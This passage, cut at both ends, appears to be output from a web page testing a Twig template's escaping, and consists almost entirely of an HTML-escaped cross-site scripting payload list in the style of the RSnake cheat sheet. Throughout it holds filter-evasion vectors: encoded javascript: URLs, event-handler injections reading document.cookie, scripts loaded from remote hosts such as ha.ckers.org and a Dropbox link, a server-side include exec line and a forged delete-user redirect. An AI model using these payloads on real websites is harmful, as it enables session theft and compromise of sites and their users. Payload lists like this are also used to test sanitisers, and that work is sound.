TYPE=\\\"text/javascript\\\"&gt;alert&#40;\\\'XSS\\\'&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\"(\\\'XSS\\\')\\\");}&lt;/STYLE&gt;&lt;A &gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(\\\'XSS\\\')\\\")}&lt;/STYLE&gt;\\r\\n&lt;XSS &gt;\\r\\n&lt;XSS &gt;\\r\\n\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/FRAMESET&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;IMG SRC=`javascript:alert(\\\&quot;RSnake says, \\\&#039;XSS\\\&#039;\\\&quot;)`&gt;\\r\\n&lt;a onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;xxs link&lt;/a&gt;\\r\\n&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=# onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC= onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x09;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0A;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0D;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\nperl -e \\\&#039;print \\\&quot;&lt;IMG SRC=java\\\\0script:alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&gt;\\\&quot;;\\\&#039; &gt; out\\r\\n&lt;IMG SRC=\\\&quot; &amp;#14; javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/SCRIPT&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG SRC=\\\&#039;vbscript:msgbox(\\\&quot;XSS\\\&quot;)\\\&#039;&gt;\\r\\n&lt;IMG SRC=\\\&quot;livescript:[code]\\\&quot;&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;BGSOUND SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BR SIZE=\\\&quot;&amp;{alert(\\\&#039;XSS\\\&#039;)}\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;http://ha.ckers.org/xss.css\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;http://ha.ckers.org/xss.css\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;STYLE&gt;BODY{-moz-binding:url(\\\&quot;http://ha.ckers.org/xssmoz.xml#xss\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert(\\\&quot;XSS\\\&quot;)\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:ex/*XSS*//*/*/pression(alert(\\\&quot;XSS\\\&quot;))\\\&#039;&gt;\\r\\n&lt;STYLE TYPE=\\\&quot;text/javascript\\\&quot;&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;behavior: url(xss.htc);\\\&quot;&gt;\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(&amp;#1;javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: expression(alert(\\\&#039;XSS\\\&#039;));\\\&quot;&gt;\\r\\n&lt;BASE HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);//\\\&quot;&gt;\\r\\n &lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://ha.ckers.org/scriptlet.html\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\&quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\&quot; type=\\\&quot;image/svg+xml\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\n&lt;SCRIPT SRC=\\\&quot;http://ha.ckers.org/xss.jpg\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;&lt;SCR\\\&#039;\\\&quot;--&gt;&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\\&#039;\\\&quot;--&gt;\\r\\n&lt;? echo(\\\&#039;&lt;SCR)\\\&#039;;echo(\\\&#039;IPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&#039;); ?&gt;\\r\\n&lt;IMG SRC=\\\&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\&quot;&gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Set-Cookie\\\&quot; Content=\\\&quot;USERID=&lt;SCRIPT&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n &lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(\\\&#039;XSS\\\&#039;);+ADw-/SCRIPT+AD4-\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT =\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;A HREF=\\\&quot;http://66.102.7.147/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://1113982867/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://0x42.0x0000066.0x7.0x93/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;http://0102.0146.0007.00000223/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\&quot;htt p://6 6.000146.0x7.147/\\\&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;iframe %00 src=\\\&quot;&amp;Tab;javascript:prompt(1)&amp;Tab;\\\&quot;%00&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;\\\&#039;&lt;iframe/onload=confirm(1)&gt;\\\&#039;\\r\\n&lt;input/onmouseover=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n&lt;sVg&gt;&lt;scRipt %00&gt;alert&amp;lpar;1&amp;rpar; {Opera}\\r\\n&lt;img/src=`%00` onerror=this.onerror=confirm(1) \\r\\n&lt;form&gt;&lt;isindex formaction=\\\&quot;javascript&amp;colon;confirm(1)\\\&quot;\\r\\n&lt;img src=`%00`&amp;NewLine; onerror=alert(1)&amp;NewLine;\\r\\n&lt;script/&amp;Tab; src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; /&amp;Tab;&gt;&lt;/script&gt;\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?\\r\\n&lt;iframe/src=\\\&quot;data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\&quot;&gt;\\r\\n&lt;script /*%00*/&gt;/*%00*/alert(1)/*%00*/&lt;/script /*%00*/\\r\\n&amp;#34;&amp;#62;&lt;h1/onmouseover=\\\&#039;\\\\u0061lert(1)\\\&#039;&gt;%00\\r\\n&lt;iframe/src=\\\&quot;data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;\\\&quot;&gt;\\r\\n&lt;meta content=\\\&quot;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)\\\&quot; http-equiv=\\\&quot;refresh\\\&quot;/&gt;\\r\\n&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(\\\&#039;https://www.google.com/\\\&#039;)&gt;&lt;/script\\r\\n&lt;svg&gt;&lt;script x:href=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; {Opera}\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:confirm(1)\\\&quot;&gt;\\r\\n&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;\\r\\n&lt;form&gt;&lt;a href=\\\&quot;javascript:\\\\u0061lert&amp;#x28;1&amp;#x29;\\\&quot;&gt;X\\r\\n&lt;/script&gt;&lt;img/*%00/src=\\\&quot;worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;\\\&quot;/%00*/onerror=\\\&#039;eval(src)\\\&#039;&gt;\\r\\n&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;\\r\\n&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src=\\\&quot;javascript&amp;#58;alert(1)\\\&quot;&amp;#11;&amp;#10;&amp;#09;;&gt;\\r\\n&lt;a href=\\\&quot;data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a\\r\\nhttp://www.google&lt;script .com&gt;alert(document.location)&lt;/script\\r\\n&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;\\\&quot;&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;\\\&quot;&gt;XYZ&lt;/a\\r\\n&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt(\\\&#039;&amp;#49;\\\&#039;)\\r\\n&lt;style/onload=prompt&amp;#40;\\\&#039;&amp;#88;&amp;#83;&amp;#83;\\\&#039;&amp;#41;\\r\\n&lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^\\r\\n&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-(\\r\\n&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;\\\&quot;date\\\&quot; onfocus=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;form&gt;&lt;textarea &amp;#13; onkeyup=\\\&#039;\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&amp;#x28;1&amp;#x29;\\\&#039;&gt;\\r\\n&lt;script /***/&gt;/***/confirm(\\\&#039;\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\&#039;)/***/&lt;/script /***/\\r\\n&lt;iframe srcdoc=\\\&#039;&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;\\\&#039;&gt;\\r\\n&lt;a href=\\\&quot;javascript:void(0)\\\&quot; onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;\\r\\n&lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt;\\r\\n&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;\\r\\n&lt;///style///&gt;&lt;span %2F onmousemove=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;SPAN\\r\\n&lt;img/src=\\\&#039;http://i.imgur.com/P8mL8.jpg\\\&#039; onmouseover=&amp;Tab;prompt(1)\\r\\n&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;\\\&#039;&lt;body/onload=confirm(1)&gt;\\\&#039;\\r\\n&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}\\r\\n&lt;marquee onstart=\\\&#039;javascript:alert&amp;#x28;1&amp;#x29;\\\&#039;&gt;^__^\\r\\n&lt;div/style=\\\&quot;width:expression(confirm(1))\\\&quot;&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(1)\\r\\n//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=\\\&#039;submit\\\&#039;&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\&quot;&lt;iframe/src=@\\\&quot;/onload=prompt(1) /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039;&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;\\\&#039;&lt;style/onload=this.onload=confirm(1)&gt;\\\&#039;&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/href=\\\&quot;javascript:&amp;#13; javascript:prompt(1)\\\&quot;&gt;&lt;input type=\\\&quot;X\\\&quot;&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/onmouseover=prompt(1)\\r\\n&lt;/svg&gt;\\\&#039;\\\&#039;&lt;svg&gt;&lt;script \\\&#039;AQuickBrownFoxJumpsOverTheLazyDog\\\&#039;&gt;alert&amp;#x28;1&amp;#x29; {Opera}\\r\\n&lt;a href=\\\&quot;javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;\\\&quot;&gt;&lt;button&gt;\\r\\n&lt;div onmouseover=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe style=\\\&quot;position:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;\\\&quot;&gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;var onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;onerror=\\\&#039;prompt(1)\\\&#039;\\\&quot;&gt;\\r\\n&lt;%&lt;!--\\\&#039;%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;\\r\\n&lt;script src=\\\&quot;data:text/javascript,alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n&lt;iframe/onreadystatechange=alert(1)\\r\\n&lt;svg/onload=alert(1)\\r\\n&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)\\r\\n&lt;input type=\\\&quot;text\\\&quot; value=`` &lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt;X&lt;/div&gt;\\r\\nhttp://www.&lt;script&gt;alert(1)&lt;/script .com\\r\\n&lt;iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;svg&gt;&lt;script ?&gt;alert(1)\\r\\n&lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;img src=`xx:xx`onerror=alert(1)&gt;\\r\\n&lt;object type=\\\&quot;text/x-scriptlet\\\&quot; data=\\\&quot;http://jsfiddle.net/XLE63/ \\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;javascript&amp;colon;alert(1)\\\&quot;/&gt;\\r\\n&lt;math&gt;&lt;a 